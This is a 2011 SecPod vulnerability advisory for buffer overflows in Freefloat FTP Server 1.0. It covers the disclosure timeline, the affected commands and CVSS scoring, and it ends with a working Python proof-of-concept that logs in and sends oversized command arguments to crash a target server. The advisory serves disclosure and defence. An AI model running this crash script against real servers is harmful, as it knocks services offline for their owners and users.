############################################################################### Freefloat FTP Server POST Auth Multiple Commands Buffer Overflow Vulnerabilities SecPod Technologies (www.secpod.com) Author: Veerendra G.G ############################################################################### SecPod ID: 1019 19/07/2011 Issue Discovered 19/07/2011 Vendor Notified No Response From Vendor 04/08/2011 Advisory Released Class: Buffer Overflow Severity: High Overview: --------- Freefloat FTP Server Version 1.0 is prone to multiple Commands Buffer Overflow vulnerabilities. Technical Description: ---------------------- The flaws are caused due to input validation errors while processing DELE, MDTM, RETR, RMD, RNFR, RNTO, STOU, STOR, SIZE, APPE, STAT commands. These can be exploited by sending an overly long command argument causing the buffer to overflow. Impact: -------- Successful exploitation may allow remote attackers to execute arbitrary code or cause a denial of service condition. Affected Software: ------------------ Freefloat FTP Server Version 1.0 Tested on: ----------- Freefloat FTP Server Version 1.0 on Windows XP SP3 En. References: ----------- http://secpod.org/blog/?p=310 http://secpod.org/SECPOD_FreeFloat_FTP_Server_BoF_PoC.py http://secpod.org/advisories/SECPOD_FreeFloat_FTP_Server_BoF.txt http://www.freefloat.com/sv/freefloat-ftp-server/freefloat-ftp-server.php Proof of Concept: ---------------- http://secpod.org/SECPOD_FreeFloat_FTP_Server_BoF_PoC.py (or see below) Solution: ---------- Not available Risk Factor: ------------- CVSS Score Report: ACCESS_VECTOR = NETWORK ACCESS_COMPLEXITY = LOW AUTHENTICATION = SINGLE INSTANCE CONFIDENTIALITY_IMPACT = PARTIAL INTEGRITY_IMPACT = PARTIAL AVAILABILITY_IMPACT = COMPLETE EXPLOITABILITY = PROOF_OF_CONCEPT REMEDIATION_LEVEL = UNAVAILABLE REPORT_CONFIDENCE = CONFIRMED CVSS Base Score = 8.0 (AV:N/AC:L/Au:SI/C:P/I:P/A:C) CVSS Temporal Score = 7.2 Risk factor = High Credits: -------- Veerendra G.G of SecPod Technologies has been credited with the discovery of this vulnerability. ============================================================ #!/usr/bin/python ############################################################################## # Title : Freefloat FTP Server Multiple Buffer Overflow Vulnerabilities # Author : Veerendra G.G from SecPod Technologies (www.secpod.com) # Vendor : http://www.freefloat.com/sv/utilities-tools/utilities-tools.php # Advisory : http://secpod.org/blog/?p=310 # http://secpod.org/SECPOD_FreeFloat_FTP_Server_BoF_PoC.py # http://secpod.org/advisories/SECPOD_FreeFloat_FTP_Server_BoF.txt # Version : Freefloat FTP Server Version 1.0 # Date : 21/07/2011 ############################################################################## import sys, socket def exploit(HOST, PORT, CMD): try: tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) tcp_sock.connect((HOST, PORT)) except Exception, msg: print "[-] Not able to connect to : " , HOST sys.exit(0) res = tcp_sock.recv(1024) if "220 FreeFloat" not in res: print "[-] FreeFloat FTP Server Not Found..." tcp_sock.close() sys.exit(0) tcp_sock.send("USER test\r\n") tcp_sock.recv(1024) tcp_sock.send("PASS test\r\n") tcp_sock.recv(1024) tcp_sock.send(CMD + " "+ "A" * 1000 + "\r\n") tcp_sock.close() if __name__ == "__main__": if len(sys.argv) < 2: print "\t[-] Usage: python exploit.py target_ip" print "\t[-] Example : python exploit.py 127.0.0.1" print "\t[-] Exiting..." sys.exit(0) HOST = sys.argv[1] PORT = 21 ## Vulnerable Commands CMDs = ["DELE", "MDTM", "RETR", "RMD", "RNFR", "RNTO", "STOU", "STOR", "SIZE", "APPE", "STAT"] for CMD in CMDs: print "[+] Connecting with server..." exploit(HOST, PORT, CMD) print "[+] Exploit Sent with %s command..." %(CMD) print "[+] Checking Server Crashed or not..." try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) s.close() except Exception, msg: print "[+] Server Crashed with %s Command" %(CMD) sys.exit(0)